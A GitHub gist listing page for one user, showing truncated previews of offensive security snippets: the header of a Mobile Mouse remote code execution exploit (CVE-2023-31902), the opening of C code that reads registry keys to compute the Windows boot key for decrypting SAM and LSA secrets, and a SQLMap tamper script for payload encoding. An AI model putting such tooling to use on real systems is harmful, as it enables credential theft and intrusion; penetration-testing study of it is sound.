Skip to content

Instantly share code, notes, and snippets.

View hxlxmj's full-sized avatar

Halim J. hxlxmj

View GitHub Profile
@hxlxmj
hxlxmj / CVE-2023-31902.py
Last active May 29, 2024 15:42
OSCP Mobile Mouse Server Exploit FIXED
# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution
# Date: May 28, 2024
# Exploit Edited: Halim Jabbes
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Microsoft Windows NT 10.0.19045.0
#!/usr/bin/env python3
@hxlxmj
hxlxmj / drag-and-drop-file-to-upload.markdown
Created December 26, 2024 02:43
Drag-and-Drop File to Upload
@hxlxmj
hxlxmj / DumpBootKey.c
Created October 19, 2025 16:20 — forked from Dfte/DumpBootKey.c
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)
void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
HKEY hKey;
LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
if (result != ERROR_SUCCESS) {
fprintf(stderr, "Error opening registry key: %ld\n", result);
@hxlxmj
hxlxmj / hex-entity-encode.py
Created February 20, 2026 00:35 — forked from m3m0o/hex-entity-encode.py
SQLMap Tamper to Convert Payloads Characters to Hex Entities
#!/usr/bin/env python3
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
if payload: